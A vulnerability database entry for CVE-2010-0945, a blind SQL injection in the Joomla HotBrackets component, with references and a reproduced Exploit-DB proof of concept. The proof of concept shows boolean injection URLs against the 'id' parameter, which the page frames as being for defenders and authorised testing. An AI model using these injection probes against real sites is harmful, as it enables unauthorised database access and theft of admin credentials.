CVE-2010-0945
Description
SQL injection vulnerability in the HotBrackets Tournament Brackets (com_hotbrackets) component for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter to index.php.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Joomla! Component com_hotbrackets - Blind SQL Injection
<------------------- header data start ------------------- >
#############################################################
# Joomla Component com_hotbrackets Blind SQL injection Vulnerability
#############################################################
# author : Fl0riX
# Name : com_hotbrackets
# Bug Type : Blind SQL Injection
# Infection : Admin login bilgileri alınabilir.
# Demo Vuln. :
TRUE(+)
ยป http://server/index.php?option=com_hotbrackets&id=1 and 1=1
FALSE(-)
ยป http://server/index.php?option=com_hotbrackets&id=1 and 1=0
# Bug Fix Advice : Zararlı karakterler filtrelenmelidir.
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
path/index.php?option=com_hotbrackets&id=[Blind]
< -- bug code end of -- >
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| hotbrackets | com_hotbrackets | | |
| joomla | joomla\! | | |
References
- http://www.exploit-db.com/exploits/10953
- http://www.packetstormsecurity.org/0912-exploits/joomlahotbrackets-sql.txt
- http://www.securityfocus.com/bid/37439
- http://www.vupen.com/english/advisories/2010/0021
- https://exchange.xforce.ibmcloud.com/vulnerabilities/54986
- http://www.exploit-db.com/exploits/10953
- http://www.packetstormsecurity.org/0912-exploits/joomlahotbrackets-sql.txt
- http://www.securityfocus.com/bid/37439
- http://www.vupen.com/english/advisories/2010/0021
- https://exchange.xforce.ibmcloud.com/vulnerabilities/54986
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.